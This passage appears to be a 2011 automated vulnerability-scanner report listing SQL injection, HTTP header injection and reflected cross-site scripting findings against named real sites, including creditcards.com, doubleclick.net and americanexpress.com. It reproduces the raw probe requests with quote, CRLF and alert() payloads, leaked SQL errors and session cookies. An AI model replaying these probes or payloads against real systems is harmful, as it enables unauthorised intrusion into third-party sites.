GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32'&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32''&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.13. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_java parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_java parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1'&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329972&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2Ffine-print%2F&dt=1308311972312&bpp=1&shv=r20110608&jsv=r20110607&correlator=1308311972399&frm=4&adk=2114403254&ga_vid=1977312224.1308311973&ga_sid=1308311973&ga_hid=683643976&ga_fc=0&u_tz=-300&u_his=2&u_java=1''&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&ref=http%3A%2F%2Fblogs.creditcards.com%2F&fu=0&ifi=1&dtd=418&xpc=zFI7KhULCH&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.14. http://googleads.g.doubleclick.net/pagead/ads [u_tz parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The u_tz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_tz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300'&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300''&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.15. http://googleads.g.doubleclick.net/pagead/ads [xpc parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The xpc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the xpc parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2'&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 1

Request 2

GET /pagead/ads?client=ca-pub-3561925617094932&output=html&h=90&slotname=7157486477&w=728&lmt=1308329943&flash=10.3.181&url=http%3A%2F%2Fblogs.creditcards.com%2F&dt=1308311938262&bpp=3&shv=r20110608&jsv=r20110607&correlator=1308311943903&frm=4&adk=2114403254&ga_vid=305312364.1308311945&ga_sid=1308311945&ga_hid=969897588&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1049&bih=893&eid=33895142&ref=http%3A%2F%2Fwww.creditcards.com%2Fpoints-rewards.php&fu=0&ifi=1&dtd=6397&xpc=wxkaSGm8f2''&p=http%3A//blogs.creditcards.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698; __ar_v4=SDUW4IOBWFCKJBD7TJN7TI%3A20110613%3A2%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110613%3A2%7CM5OOXYHITZA7XGIMSMOSWH%3A20110613%3A2%7COBXRF4HH6JFXLDDVFSEQTM%3A20110613%3A2

Response 2

1.16. http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?1'=1 HTTP/1.1
Host: www.creditcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:23:04 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3549
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 12:23:05 GMT; path=/
Connection: close

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '1'=1'; File: /usr/local/apache2/htdocs/us_pr
...[SNIP]...

Request 2

GET /oc/?1''=1 HTTP/1.1
Host: www.creditcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:23:05 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=10&evid=101110617071219b8fa6e37e56ae1efc&ref=&oid=1012011061707230533052891&data3=0&sid=1889&c=1%27%27%3D1
Vary: Accept-Encoding
Content-Length: 2733
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 12:23:05 GMT; path=/
Connection: close

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

1.17. http://www.creditcards.com/oc/ [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/oc/

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /oc/?pid=22105561'&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:13 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3607
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:13 GMT; path=/

<center><span class='error'>SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''22105561''' at line 1; SQL:SELECT * FROM cms_cards WHERE cardId = '22105561''; File: /usr/local/apach
...[SNIP]...

Request 2

GET /oc/?pid=22105561''&pg=17&pgpos=1 HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/business.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCCID=173.193.214.243_20110617053924_f5fd4d9c; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308311437978272; PHPSESSID=eaa1e85235ccec63f45bfe7e1b69c40f; ACTREF=eaa1e85235ccec63f45bfe7e1b69c40f_999__201106170650; CURRREF=999; PREVREF=999; SSBAL=node.web1; s_cc=true; CCsCookieimp=1308311932; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308307272532%27%5D%2C%5B%27999-0-0-0%27%2C%271308311460361%27%5D%2C%5B%27999-0-9999-9999%27%2C%271308311937698%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253Abusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/oc/%25253Fpid%25253D22105561%252526pg%25253D17%252526pgpos%25253D1%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:13 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
refresh: 2; url=http://oc.creditcards.com/trans_node.php?aid=999&tid=&cid=9999&did=9999&fid=17&pos=1&evid=1011106170650383a0cd48cdfdd3a86c&ref=&oid=1012011061706591324277182&data3=0&sid=1889&c=22105561%27%27
Vary: Accept-Encoding
Content-Length: 2759
Content-Type: text/html
Set-Cookie: cardOfferHistory=%2Cdeleted; expires=Sun, 17-Jul-2011 11:59:13 GMT; path=/

<html>
<head>
<title>Just a Moment While We Direct You to Your Offer</title>
<meta name="robots" content="NOFOLLOW,NOINDEX">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

2. HTTP header injection previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 37d3b%0d%0a3ba1d4f669b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /37d3b%0d%0a3ba1d4f669b;spot=1297440;src=1507354;host=integrate.112.2o7.net%2Fdfa_echo?var%3Ds_1_Integrate_DFA_get_0%26AQE%3D1%26A2S%3D1;ord=4590351900266 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732?PID=1a69c8%22-alert(document.location)-%2236ea2529e7b&BUID=SBS&PSKU=SCB&CRTV=SCBPML&EAID=EhraRx8K%2FBE-figIFch8YIne3Ub0J2Tk5g
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/37d3b
3ba1d4f669b;spot=1297440;src=1507354;host=integrate.112.2o7.net/dfa_echo:
Date: Fri, 17 Jun 2011 12:05:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected) previous next
There are 29 instances of this issue:

http://blogs.creditcards.com/ [name of an arbitrarily supplied request parameter]
http://blogs.creditcards.com/fine-print/ [name of an arbitrarily supplied request parameter]
http://click.linksynergy.com/fs-bin/click [offerid parameter]
http://oc.creditcards.com/trans_node.php [c parameter]
http://oc.creditcards.com/trans_node.php [name of an arbitrarily supplied request parameter]
http://s46.sitemeter.com/js/counter.asp [site parameter]
http://s46.sitemeter.com/js/counter.js [site parameter]
http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]
http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [external_id parameter]
http://www.creditcards.com/business.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/low-interest-page-4.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/low-interest.php [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ [name of an arbitrarily supplied request parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pg parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pgpos parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/oc/ [pid parameter]
http://www.creditcards.com/points-rewards.php [name of an arbitrarily supplied request parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [BUID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [CRTV parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [EAID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PID parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [PSKU parameter]
http://www262.americanexpress.com/landing-page/business-cards/mclp/scashplum/pm0002/42732 [name of an arbitrarily supplied request parameter]
http://s46.sitemeter.com/js/counter.asp [IP cookie]
http://s46.sitemeter.com/js/counter.js [IP cookie]
http://www.capitalone.com/smallbusiness/cards/venture-for-business/ [v1st cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

3.1. http://blogs.creditcards.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba3d2"-alert(1)-"9c8eb9e5473 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ba3d2"-alert(1)-"9c8eb9e5473=1 HTTP/1.1
Host: blogs.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/points-rewards.php
